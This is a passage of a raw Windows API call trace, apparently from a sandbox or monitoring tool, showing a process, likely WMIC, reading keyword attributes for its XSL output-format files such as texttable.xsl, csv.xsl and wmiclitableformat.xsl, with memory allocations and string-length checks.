This=0x1f4a280, value=0x17f3f0 | out: value=0x17f3f0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="TABLE", varVal2=0x9006b001d)) returned 0x0 [0149.303] malloc (_Size=0x18) returned 0x239020 [0149.303] malloc (_Size=0x18) returned 0x239000 [0149.303] malloc (_Size=0x30) returned 0x2380c0 [0149.303] IUnknown:Release (This=0x1f4bd50) returned 0x0 [0149.303] IUnknown:Release (This=0x1f478d0) returned 0x0 [0149.303] IUnknown:Release (This=0x1f4a280) returned 0x0 [0149.303] IXMLDOMNodeList:get_item (in: This=0x1f49cc0, index=1, listItem=0x17f3a0 | out: listItem=0x17f3a0*=0x1f4bd50) returned 0x0 [0149.303] IXMLDOMNode:get_text (in: This=0x1f4bd50, text=0x17f3b0 | out: text=0x17f3b0*="textvaluelist.xsl") returned 0x0 [0149.303] IXMLDOMNode:get_attributes (in: This=0x1f4bd50, attributeMap=0x17f3a8 | out: attributeMap=0x17f3a8*=0x1f478d0) returned 0x0 [0149.303] malloc (_Size=0x18) returned 0x239060 [0149.303] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1f478d0, name="KEYWORD", namedItem=0x17f3b8 | out: namedItem=0x17f3b8*=0x1f4a280) returned 0x0 [0149.303] free (_Block=0x239060) [0149.303] IXMLDOMNode:get_nodeValue (in: This=0x1f4a280, value=0x17f3f0 | out: value=0x17f3f0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="VALUE", varVal2=0x9006b001d)) returned 0x0 [0149.303] malloc (_Size=0x18) returned 0x239060 [0149.304] malloc (_Size=0x18) returned 0x239080 [0149.304] SysStringLen (param_1="VALUE") returned 0x5 [0149.304] SysStringLen (param_1="TABLE") returned 0x5 [0149.304] SysStringLen (param_1="TABLE") returned 0x5 [0149.304] SysStringLen (param_1="VALUE") returned 0x5 [0149.304] malloc (_Size=0x30) returned 0x238100 [0149.304] IUnknown:Release (This=0x1f4bd50) returned 0x0 [0149.304] IUnknown:Release (This=0x1f478d0) returned 0x0 [0149.304] IUnknown:Release (This=0x1f4a280) returned 0x0 [0149.304] IXMLDOMNodeList:get_item (in: This=0x1f49cc0, index=2, listItem=0x17f3a0 | out: listItem=0x17f3a0*=0x1f4bd50) returned 0x0 [0149.304] IXMLDOMNode:get_text (in: This=0x1f4bd50, text=0x17f3b0 | out: text=0x17f3b0*="textvaluelist.xsl") returned 0x0 [0149.304] IXMLDOMNode:get_attributes (in: This=0x1f4bd50, attributeMap=0x17f3a8 | out: attributeMap=0x17f3a8*=0x1f478d0) returned 0x0 [0149.304] malloc (_Size=0x18) returned 0x2390a0 [0149.304] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1f478d0, name="KEYWORD", namedItem=0x17f3b8 | out: namedItem=0x17f3b8*=0x1f4a280) returned 0x0 [0149.304] free (_Block=0x2390a0) [0149.304] IXMLDOMNode:get_nodeValue (in: This=0x1f4a280, value=0x17f3f0 | out: value=0x17f3f0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="LIST", varVal2=0x9006b001d)) returned 0x0 [0149.304] malloc (_Size=0x18) returned 0x2390a0 [0149.305] malloc (_Size=0x18) returned 0x2390c0 [0149.305] SysStringLen (param_1="LIST") returned 0x4 [0149.305] SysStringLen (param_1="TABLE") returned 0x5 [0149.305] malloc (_Size=0x30) returned 0x238140 [0149.305] IUnknown:Release (This=0x1f4bd50) returned 0x0 [0149.305] IUnknown:Release (This=0x1f478d0) returned 0x0 [0149.305] IUnknown:Release (This=0x1f4a280) returned 0x0 [0149.305] IXMLDOMNodeList:get_item (in: This=0x1f49cc0, index=3, listItem=0x17f3a0 | out: listItem=0x17f3a0*=0x1f4bd50) returned 0x0 [0149.305] IXMLDOMNode:get_text (in: This=0x1f4bd50, text=0x17f3b0 | out: text=0x17f3b0*="rawxml.xsl") returned 0x0 [0149.305] IXMLDOMNode:get_attributes (in: This=0x1f4bd50, attributeMap=0x17f3a8 | out: attributeMap=0x17f3a8*=0x1f478d0) returned 0x0 [0149.305] malloc (_Size=0x18) returned 0x2390e0 [0149.305] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1f478d0, name="KEYWORD", namedItem=0x17f3b8 | out: namedItem=0x17f3b8*=0x1f4a280) returned 0x0 [0149.305] free (_Block=0x2390e0) [0149.305] IXMLDOMNode:get_nodeValue (in: This=0x1f4a280, value=0x17f3f0 | out: value=0x17f3f0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="RAWXML", varVal2=0x9006b001d)) returned 0x0 [0149.305] malloc (_Size=0x18) returned 0x2390e0 [0149.305] malloc (_Size=0x18) returned 0x239100 [0149.305] SysStringLen (param_1="RAWXML") returned 0x6 [0149.305] SysStringLen (param_1="TABLE") returned 0x5 [0149.306] SysStringLen (param_1="RAWXML") returned 0x6 [0149.306] SysStringLen (param_1="LIST") returned 0x4 [0149.306] SysStringLen (param_1="LIST") returned 0x4 [0149.306] SysStringLen (param_1="RAWXML") returned 0x6 [0149.306] malloc (_Size=0x30) returned 0x238180 [0149.306] IUnknown:Release (This=0x1f4bd50) returned 0x0 [0149.306] IUnknown:Release (This=0x1f478d0) returned 0x0 [0149.306] IUnknown:Release (This=0x1f4a280) returned 0x0 [0149.306] IXMLDOMNodeList:get_item (in: This=0x1f49cc0, index=4, listItem=0x17f3a0 | out: listItem=0x17f3a0*=0x1f4bd50) returned 0x0 [0149.306] IXMLDOMNode:get_text (in: This=0x1f4bd50, text=0x17f3b0 | out: text=0x17f3b0*="htable.xsl") returned 0x0 [0149.306] IXMLDOMNode:get_attributes (in: This=0x1f4bd50, attributeMap=0x17f3a8 | out: attributeMap=0x17f3a8*=0x1f478d0) returned 0x0 [0149.306] malloc (_Size=0x18) returned 0x239120 [0149.306] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1f478d0, name="KEYWORD", namedItem=0x17f3b8 | out: namedItem=0x17f3b8*=0x1f4a280) returned 0x0 [0149.306] free (_Block=0x239120) [0149.306] IXMLDOMNode:get_nodeValue (in: This=0x1f4a280, value=0x17f3f0 | out: value=0x17f3f0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="HTABLE", varVal2=0x9006b001d)) returned 0x0 [0149.306] malloc (_Size=0x18) returned 0x239120 [0149.307] malloc (_Size=0x18) returned 0x239140 [0149.307] SysStringLen (param_1="HTABLE") returned 0x6 [0149.307] SysStringLen (param_1="TABLE") returned 0x5 [0149.307] SysStringLen (param_1="HTABLE") returned 0x6 [0149.307] SysStringLen (param_1="LIST") returned 0x4 [0149.307] malloc (_Size=0x30) returned 0x2381c0 [0149.307] IUnknown:Release (This=0x1f4bd50) returned 0x0 [0149.307] IUnknown:Release (This=0x1f478d0) returned 0x0 [0149.307] IUnknown:Release (This=0x1f4a280) returned 0x0 [0149.307] IXMLDOMNodeList:get_item (in: This=0x1f49cc0, index=5, listItem=0x17f3a0 | out: listItem=0x17f3a0*=0x1f4bd50) returned 0x0 [0149.307] IXMLDOMNode:get_text (in: This=0x1f4bd50, text=0x17f3b0 | out: text=0x17f3b0*="hform.xsl") returned 0x0 [0149.307] IXMLDOMNode:get_attributes (in: This=0x1f4bd50, attributeMap=0x17f3a8 | out: attributeMap=0x17f3a8*=0x1f478d0) returned 0x0 [0149.307] malloc (_Size=0x18) returned 0x239160 [0149.307] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1f478d0, name="KEYWORD", namedItem=0x17f3b8 | out: namedItem=0x17f3b8*=0x1f4a280) returned 0x0 [0149.308] free (_Block=0x239160) [0149.308] IXMLDOMNode:get_nodeValue (in: This=0x1f4a280, value=0x17f3f0 | out: value=0x17f3f0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="HFORM", varVal2=0x9006b001d)) returned 0x0 [0149.308] malloc (_Size=0x18) returned 0x239160 [0149.308] malloc (_Size=0x18) returned 0x239180 [0149.308] SysStringLen (param_1="HFORM") returned 0x5 [0149.308] SysStringLen (param_1="TABLE") returned 0x5 [0149.308] SysStringLen (param_1="HFORM") returned 0x5 [0149.308] SysStringLen (param_1="LIST") returned 0x4 [0149.308] SysStringLen (param_1="HFORM") returned 0x5 [0149.308] SysStringLen (param_1="HTABLE") returned 0x6 [0149.308] malloc (_Size=0x30) returned 0x238200 [0149.308] IUnknown:Release (This=0x1f4bd50) returned 0x0 [0149.308] IUnknown:Release (This=0x1f478d0) returned 0x0 [0149.308] IUnknown:Release (This=0x1f4a280) returned 0x0 [0149.308] IXMLDOMNodeList:get_item (in: This=0x1f49cc0, index=6, listItem=0x17f3a0 | out: listItem=0x17f3a0*=0x1f4bd50) returned 0x0 [0149.308] IXMLDOMNode:get_text (in: This=0x1f4bd50, text=0x17f3b0 | out: text=0x17f3b0*="xml.xsl") returned 0x0 [0149.308] IXMLDOMNode:get_attributes (in: This=0x1f4bd50, attributeMap=0x17f3a8 | out: attributeMap=0x17f3a8*=0x1f478d0) returned 0x0 [0149.309] malloc (_Size=0x18) returned 0x2391a0 [0149.309] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1f478d0, name="KEYWORD", namedItem=0x17f3b8 | out: namedItem=0x17f3b8*=0x1f4a280) returned 0x0 [0149.309] free (_Block=0x2391a0) [0149.309] IXMLDOMNode:get_nodeValue (in: This=0x1f4a280, value=0x17f3f0 | out: value=0x17f3f0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="XML", varVal2=0x9006b001d)) returned 0x0 [0149.309] malloc (_Size=0x18) returned 0x2391a0 [0149.309] malloc (_Size=0x18) returned 0x2391c0 [0149.309] SysStringLen (param_1="XML") returned 0x3 [0149.309] SysStringLen (param_1="TABLE") returned 0x5 [0149.309] SysStringLen (param_1="XML") returned 0x3 [0149.309] SysStringLen (param_1="VALUE") returned 0x5 [0149.309] SysStringLen (param_1="VALUE") returned 0x5 [0149.309] SysStringLen (param_1="XML") returned 0x3 [0149.309] malloc (_Size=0x30) returned 0x238240 [0149.309] IUnknown:Release (This=0x1f4bd50) returned 0x0 [0149.310] IUnknown:Release (This=0x1f478d0) returned 0x0 [0149.310] IUnknown:Release (This=0x1f4a280) returned 0x0 [0149.310] IXMLDOMNodeList:get_item (in: This=0x1f49cc0, index=7, listItem=0x17f3a0 | out: listItem=0x17f3a0*=0x1f4bd50) returned 0x0 [0149.310] IXMLDOMNode:get_text (in: This=0x1f4bd50, text=0x17f3b0 | out: text=0x17f3b0*="mof.xsl") returned 0x0 [0149.310] IXMLDOMNode:get_attributes (in: This=0x1f4bd50, attributeMap=0x17f3a8 | out: attributeMap=0x17f3a8*=0x1f478d0) returned 0x0 [0149.310] malloc (_Size=0x18) returned 0x2391e0 [0149.310] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1f478d0, name="KEYWORD", namedItem=0x17f3b8 | out: namedItem=0x17f3b8*=0x1f4a280) returned 0x0 [0149.310] free (_Block=0x2391e0) [0149.310] IXMLDOMNode:get_nodeValue (in: This=0x1f4a280, value=0x17f3f0 | out: value=0x17f3f0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="MOF", varVal2=0x9006b001d)) returned 0x0 [0149.310] malloc (_Size=0x18) returned 0x2391e0 [0149.310] malloc (_Size=0x18) returned 0x239200 [0149.310] SysStringLen (param_1="MOF") returned 0x3 [0149.310] SysStringLen (param_1="TABLE") returned 0x5 [0149.310] SysStringLen (param_1="MOF") returned 0x3 [0149.310] SysStringLen (param_1="LIST") returned 0x4 [0149.311] SysStringLen (param_1="MOF") returned 0x3 [0149.311] SysStringLen (param_1="RAWXML") returned 0x6 [0149.311] SysStringLen (param_1="LIST") returned 0x4 [0149.311] SysStringLen (param_1="MOF") returned 0x3 [0149.311] malloc (_Size=0x30) returned 0x238280 [0149.311] IUnknown:Release (This=0x1f4bd50) returned 0x0 [0149.311] IUnknown:Release (This=0x1f478d0) returned 0x0 [0149.311] IUnknown:Release (This=0x1f4a280) returned 0x0 [0149.311] IXMLDOMNodeList:get_item (in: This=0x1f49cc0, index=8, listItem=0x17f3a0 | out: listItem=0x17f3a0*=0x1f4bd50) returned 0x0 [0149.311] IXMLDOMNode:get_text (in: This=0x1f4bd50, text=0x17f3b0 | out: text=0x17f3b0*="csv.xsl") returned 0x0 [0149.311] IXMLDOMNode:get_attributes (in: This=0x1f4bd50, attributeMap=0x17f3a8 | out: attributeMap=0x17f3a8*=0x1f478d0) returned 0x0 [0149.311] malloc (_Size=0x18) returned 0x239220 [0149.311] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1f478d0, name="KEYWORD", namedItem=0x17f3b8 | out: namedItem=0x17f3b8*=0x1f4a280) returned 0x0 [0149.311] free (_Block=0x239220) [0149.311] IXMLDOMNode:get_nodeValue (in: This=0x1f4a280, value=0x17f3f0 | out: value=0x17f3f0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="CSV", varVal2=0x9006b001d)) returned 0x0 [0149.312] malloc (_Size=0x18) returned 0x239220 [0149.312] malloc (_Size=0x18) returned 0x239240 [0149.312] SysStringLen (param_1="CSV") returned 0x3 [0149.312] SysStringLen (param_1="TABLE") returned 0x5 [0149.312] SysStringLen (param_1="CSV") returned 0x3 [0149.312] SysStringLen (param_1="LIST") returned 0x4 [0149.312] SysStringLen (param_1="CSV") returned 0x3 [0149.312] SysStringLen (param_1="HTABLE") returned 0x6 [0149.312] SysStringLen (param_1="CSV") returned 0x3 [0149.312] SysStringLen (param_1="HFORM") returned 0x5 [0149.312] malloc (_Size=0x30) returned 0x2382c0 [0149.312] IUnknown:Release (This=0x1f4bd50) returned 0x0 [0149.312] IUnknown:Release (This=0x1f478d0) returned 0x0 [0149.312] IUnknown:Release (This=0x1f4a280) returned 0x0 [0149.312] IXMLDOMNodeList:get_item (in: This=0x1f49cc0, index=9, listItem=0x17f3a0 | out: listItem=0x17f3a0*=0x1f4bd50) returned 0x0 [0149.312] IXMLDOMNode:get_text (in: This=0x1f4bd50, text=0x17f3b0 | out: text=0x17f3b0*="texttable.xsl") returned 0x0 [0149.312] IXMLDOMNode:get_attributes (in: This=0x1f4bd50, attributeMap=0x17f3a8 | out: attributeMap=0x17f3a8*=0x1f478d0) returned 0x0 [0149.312] malloc (_Size=0x18) returned 0x239260 [0149.312] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1f478d0, name="KEYWORD", namedItem=0x17f3b8 | out: namedItem=0x17f3b8*=0x1f4a280) returned 0x0 [0149.312] free (_Block=0x239260) [0149.312] IXMLDOMNode:get_nodeValue (in: This=0x1f4a280, value=0x17f3f0 | out: value=0x17f3f0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="texttablewsys.xsl", varVal2=0x9006b001d)) returned 0x0 [0149.312] malloc (_Size=0x18) returned 0x239260 [0149.313] malloc (_Size=0x18) returned 0x239280 [0149.313] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0149.313] SysStringLen (param_1="TABLE") returned 0x5 [0149.313] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0149.313] SysStringLen (param_1="VALUE") returned 0x5 [0149.313] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0149.313] SysStringLen (param_1="XML") returned 0x3 [0149.313] SysStringLen (param_1="XML") returned 0x3 [0149.313] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0149.313] malloc (_Size=0x30) returned 0x238300 [0149.313] IUnknown:Release (This=0x1f4bd50) returned 0x0 [0149.313] IUnknown:Release (This=0x1f478d0) returned 0x0 [0149.313] IUnknown:Release (This=0x1f4a280) returned 0x0 [0149.313] IXMLDOMNodeList:get_item (in: This=0x1f49cc0, index=10, listItem=0x17f3a0 | out: listItem=0x17f3a0*=0x1f4bd50) returned 0x0 [0149.313] IXMLDOMNode:get_text (in: This=0x1f4bd50, text=0x17f3b0 | out: text=0x17f3b0*="texttable.xsl") returned 0x0 [0149.313] IXMLDOMNode:get_attributes (in: This=0x1f4bd50, attributeMap=0x17f3a8 | out: attributeMap=0x17f3a8*=0x1f478d0) returned 0x0 [0149.313] malloc (_Size=0x18) returned 0x2392a0 [0149.313] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1f478d0, name="KEYWORD", namedItem=0x17f3b8 | out: namedItem=0x17f3b8*=0x1f4a280) returned 0x0 [0149.313] free (_Block=0x2392a0) [0149.313] IXMLDOMNode:get_nodeValue (in: This=0x1f4a280, value=0x17f3f0 | out: value=0x17f3f0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="texttablewsys", varVal2=0x9006b001d)) returned 0x0 [0149.313] malloc (_Size=0x18) returned 0x2392a0 [0149.314] malloc (_Size=0x18) returned 0x2392c0 [0149.314] SysStringLen (param_1="texttablewsys") returned 0xd [0149.314] SysStringLen (param_1="TABLE") returned 0x5 [0149.314] SysStringLen (param_1="texttablewsys") returned 0xd [0149.314] SysStringLen (param_1="XML") returned 0x3 [0149.314] SysStringLen (param_1="texttablewsys") returned 0xd [0149.314] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0149.314] SysStringLen (param_1="XML") returned 0x3 [0149.314] SysStringLen (param_1="texttablewsys") returned 0xd [0149.314] malloc (_Size=0x30) returned 0x238340 [0149.314] IUnknown:Release (This=0x1f4bd50) returned 0x0 [0149.314] IUnknown:Release (This=0x1f478d0) returned 0x0 [0149.314] IUnknown:Release (This=0x1f4a280) returned 0x0 [0149.314] IXMLDOMNodeList:get_item (in: This=0x1f49cc0, index=11, listItem=0x17f3a0 | out: listItem=0x17f3a0*=0x1f4bd50) returned 0x0 [0149.314] IXMLDOMNode:get_text (in: This=0x1f4bd50, text=0x17f3b0 | out: text=0x17f3b0*="texttable.xsl") returned 0x0 [0149.314] IXMLDOMNode:get_attributes (in: This=0x1f4bd50, attributeMap=0x17f3a8 | out: attributeMap=0x17f3a8*=0x1f478d0) returned 0x0 [0149.314] malloc (_Size=0x18) returned 0x2392e0 [0149.314] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1f478d0, name="KEYWORD", namedItem=0x17f3b8 | out: namedItem=0x17f3b8*=0x1f4a280) returned 0x0 [0149.314] free (_Block=0x2392e0) [0149.314] IXMLDOMNode:get_nodeValue (in: This=0x1f4a280, value=0x17f3f0 | out: value=0x17f3f0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformat.xsl", varVal2=0x9006b001d)) returned 0x0 [0149.314] malloc (_Size=0x18) returned 0x2392e0 [0149.315] malloc (_Size=0x18) returned 0x239300 [0149.315] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0149.315] SysStringLen (param_1="TABLE") returned 0x5 [0149.315] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0149.315] SysStringLen (param_1="XML") returned 0x3 [0149.315] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0149.315] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0149.315] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0149.315] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0149.315] malloc (_Size=0x30) returned 0x238380 [0149.315] IUnknown:Release (This=0x1f4bd50) returned 0x0 [0149.315] IUnknown:Release (This=0x1f478d0) returned 0x0 [0149.315] IUnknown:Release (This=0x1f4a280) returned 0x0 [0149.315] IXMLDOMNodeList:get_item (in: This=0x1f49cc0, index=12, listItem=0x17f3a0 | out: listItem=0x17f3a0*=0x1f4bd50) returned 0x0 [0149.315] IXMLDOMNode:get_text (in: This=0x1f4bd50, text=0x17f3b0 | out: text=0x17f3b0*="texttable.xsl") returned 0x0 [0149.315] IXMLDOMNode:get_attributes (in: This=0x1f4bd50, attributeMap=0x17f3a8 | out: attributeMap=0x17f3a8*=0x1f478d0) returned 0x0 [0149.315] malloc (_Size=0x18) returned 0x239320 [0149.315] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1f478d0, name="KEYWORD", namedItem=0x17f3b8 | out: namedItem=0x17f3b8*=0x1f4a280) returned 0x0 [0149.315] free (_Block=0x239320) [0149.315] IXMLDOMNode:get_nodeValue (in: This=0x1f4a280, value=0x17f3f0 | out: value=0x17f3f0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformat", varVal2=0x9006b001d)) returned 0x0 [0149.315] malloc (_Size=0x18) returned 0x239320 [0149.315] malloc (_Size=0x18) returned 0x239340 [0149.316] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0149.316] SysStringLen (param_1="TABLE") returned 0x5 [0149.316] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0149.316] SysStringLen (param_1="XML") returned 0x3 [0149.316] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0149.316] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0149.316] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0149.316] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0149.316] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0149.316] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0149.316] malloc (_Size=0x30) returned 0x2383c0 [0149.316] IUnknown:Release (This=0x1f4bd50) returned 0x0 [0149.316] IUnknown:Release (This=0x1f478d0) returned 0x0 [0149.316] IUnknown:Release (This=0x1f4a280) returned 0x0 [0149.316] IXMLDOMNodeList:get_item (in: This=0x1f49cc0, index=13, listItem=0x17f3a0 | out: listItem=0x17f3a0*=0x1f4bd50) returned 0x0 [0149.316] IXMLDOMNode:get_text (in: This=0x1f4bd50, text=0x17f3b0 | out: text=0x17f3b0*="texttable.xsl") returned 0x0 [0149.316] IXMLDOMNode:get_attributes (in: This=0x1f4bd50, attributeMap=0x17f3a8 | out: attributeMap=0x17f3a8*=0x1f478d0) returned 0x0 [0149.316] malloc (_Size=0x18) returned 0x239360 [0149.316] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1f478d0, name="KEYWORD", namedItem=0x17f3b8 | out: namedItem=0x17f3b8*=0x1f4a280) returned 0x0 [0149.316] free (_Block=0x239360) [0149.316] IXMLDOMNode:get_nodeValue (in: This=0x1f4a280, value=0x17f3f0 | out: value=0x17f3f0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformatnosys.xsl", varVal2=0x9006b001d)) returned 0x0 [0149.316] malloc (_Size=0x18) returned 0x239360 [0149.317] malloc (_Size=0x18) returned 0x239380 [0149.317] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0149.317] SysStringLen (param_1="TABLE") returned 0x5 [0149.317] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0149.317] SysStringLen (param_1="XML") returned 0x3 [0149.317] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0149.317] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0149.317] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0149.317] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0149.317] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0149.317] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0149.317] malloc (_Size=0x30) returned 0x238400 [0149.318] IUnknown:Release (This=0x1f4bd50) returned 0x0 [0149.318] IUnknown:Release (This=0x1f478d0) returned 0x0 [0149.318] IUnknown:Release (This=0x1f4a280) returned 0x0 [0149.318] IXMLDOMNodeList:get_item (in: This=0x1f49cc0, index=14, listItem=0x17f3a0 | out: listItem=0x17f3a0*=0x1f4bd50) returned 0x0 [0149.318] IXMLDOMNode:get_text (in: This=0x1f4bd50, text=0x17f3b0 | out: text=0x17f3b0*="texttable.xsl") returned 0x0 [0149.318] IXMLDOMNode:get_attributes (in: This=0x1f4bd50, attributeMap=0x17f3a8 | out: attributeMap=0x17f3a8*=0x1f478d0) returned 0x0 [0149.318] malloc (_Size=0x18) returned 0x2393a0 [0149.318] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1f478d0, name="KEYWORD", namedItem=0x17f3b8 | out: namedItem=0x17f3b8*=0x1f4a280) returned 0x0 [0149.318] free (_Block=0x2393a0) [0149.318] IXMLDOMNode:get_nodeValue (in: This=0x1f4a280, value=0x17f3f0 | out: value=0x17f3f0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformatnosys", varVal2=0x9006b001d)) returned 0x0 [0149.318] malloc (_Size=0x18) returned 0x2393a0 [0149.318] malloc (_Size=0x18) returned 0x2393c0 [0149.318] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0149.318] SysStringLen (param_1="TABLE") returned 0x5 [0149.318] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0149.318] SysStringLen (param_1="XML") returned 0x3 [0149.318] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0149.318] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0149.318] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0149.318] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0149.318] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0149.318] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0149.319] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0149.319] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0149.319] malloc (_Size=0x30) returned 0x238440 [0149.319] IUnknown:Release (This=0x1f4bd50) returned 0x0 [0149.319] IUnknown:Release (This=0x1f478d0) returned 0x0 [0149.319] IUnknown:Release (This=0x1f4a280) returned 0x0 [0149.319] IXMLDOMNodeList:get_item (in: This=0x1f49cc0, index=15, listItem=0x17f3a0 | out: listItem=0x17f3a0*=0x1f4bd50) returned 0x0 [0149.319] IXMLDOMNode:get_text (in: This=0x1f4bd50, text=0x17f3b0 | out: text=0x17f3b0*="htable.xsl") returned 0x0 [0149.319] IXMLDOMNode:get_attributes (in: This=0x1f4bd50, attributeMap=0x17f3a8 | out: attributeMap=0x17f3a8*=0x1f478d0) returned 0x0 [0149.319] malloc (_Size=0x18) returned 0x2393e0 [0149.319] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1f478d0, name="KEYWORD", namedItem=0x17f3b8 | out: namedItem=0x17f3b8*=0x1f4a280) returned 0x0 [0149.319] free (_Block=0x2393e0) [0149.319] IXMLDOMNode:get_nodeValue (in: This=0x1f4a280, value=0x17f3f0 | out: value=0x17f3f0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="htable-sortby.xsl", varVal2=0x9006b001d)) returned 0x0 [0149.319] malloc (_Size=0x18) returned 0x2393e0 [0149.319] malloc (_Size=0x18) returned 0x239400 [0149.319] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0149.319] SysStringLen (param_1="TABLE") returned 0x5 [0149.319] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0149.319] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0149.319] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0149.319] SysStringLen (param_1="XML") returned 0x3 [0149.319] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0149.320] SysStringLen (param_1="texttablewsys") returned 0xd [0149.320] SysStringLen (param_1="XML") returned 0x3 [0149.320] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0149.320] malloc (_Size=0x30) returned 0x238480 [0149.320] IUnknown:Release (This=0x1f4bd50) returned 0x0 [0149.320] IUnknown:Release (This=0x1f478d0) returned 0x0 [0149.320] IUnknown:Release (This=0x1f4a280) returned 0x0 [0149.320] IXMLDOMNodeList:get_item (in: This=0x1f49cc0, index=16, listItem=0x17f3a0 | out: listItem=0x17f3a0*=0x1f4bd50) returned 0x0 [0149.320] IXMLDOMNode:get_text (in: This=0x1f4bd50, text=0x17f3b0 | out: text=0x17f3b0*="htable.xsl") returned 0x0 [0149.320] IXMLDOMNode:get_attributes (in: This=0x1f4bd50, attributeMap=0x17f3a8 | out: attributeMap=0x17f3a8*=0x1f478d0) returned 0x0 [0149.320] malloc (_Size=0x18) returned 0x239420 [0149.320] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1f478d0, name="KEYWORD", namedItem=0x17f3b8 | out: namedItem=0x17f3b8*=0x1f4a280) returned 0x0 [0149.320] free (_Block=0x239420) [0149.320] IXMLDOMNode:get_nodeValue (in: This=0x1f4a280, value=0x17f3f0 | out: value=0x17f3f0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="htable-sortby", varVal2=0x9006b001d)) returned 0x0 [0149.320] malloc (_Size=0x18) returned 0x239420 [0149.320] malloc (_Size=0x18) returned 0x239440 [0149.320] SysStringLen (param_1="htable-sortby") returned 0xd [0149.320] SysStringLen (param_1="TABLE") returned 0x5 [0149.320] SysStringLen (param_1="htable-sortby") returned 0xd [0149.320] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0149.320] SysStringLen (param_1="htable-sortby") returned 0xd [0149.320] SysStringLen (param_1="XML") returned 0x3 [0149.320] SysStringLen (param_1="htable-sortby") returned 0xd [0149.321] SysStringLen (param_1="texttablewsys") returned 0xd [0149.321] SysStringLen (param_1="htable-sortby") returned 0xd [0149.321] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0149.321] SysStringLen (param_1="XML") returned 0x3 [0149.321] SysStringLen (param_1="htable-sortby") returned 0xd [0149.321] malloc (_Size=0x30) returned 0x2384c0 [0149.321] IUnknown:Release (This=0x1f4bd50) returned 0x0 